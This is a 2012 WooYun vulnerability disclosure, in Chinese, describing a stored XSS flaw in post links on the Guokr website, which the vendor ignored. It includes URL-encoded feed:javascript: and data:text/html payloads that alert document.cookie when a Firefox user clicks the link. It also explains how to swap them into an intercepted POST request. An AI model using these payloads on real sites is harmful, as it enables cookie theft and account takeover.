漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-011057
漏洞标题:果壳网存在储存型xss,可点击劫持
相关厂商:果壳传媒
漏洞作者: kamael
提交时间:2012-08-19 10:55
修复时间:2012-08-24 10:56
公开时间:2012-08-24 10:56
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-08-19: 细节已通知厂商并且等待厂商处理中
2012-08-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
果壳网在发帖过滤上存在过滤不严的情况,可导致点击劫持
详细说明:
这个在果壳网能发帖的地方几乎都是,不过只针对firefox浏览器用户。在插入链接的时候没有严格检查A标签的协议,导致可以插入feed:,data:等标签。当然直接插是不能的,不过抓包一下,修改对应的链接就可以了。
原本的post应该是这样:content=%5Burl+href%3Dhttp%3A%2F%2Frenren.com%5Dhttp%3A%2F%2Frenren.com%5B%2Furl%5D
可以抓包后把中间的"http%3A%2F%2Frenren.com"改为"feed%3ajavascript%3a%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%6F%69%64%28%30%29%3B"或"data:%74%65%78%74%2F%68%74%6D%6C%2C%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%69%6F%64%28%30%29%3B%3C%2F%73%63%72%69%70%74%3E",发帖后firefox用户点击就悲剧了。
证明看下面。
漏洞证明:
修复方案:
只允许a标签里插入http://头
版权声明:转载请注明来源 kamael@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-08-24 10:56
厂商回复:
最新状态:
暂无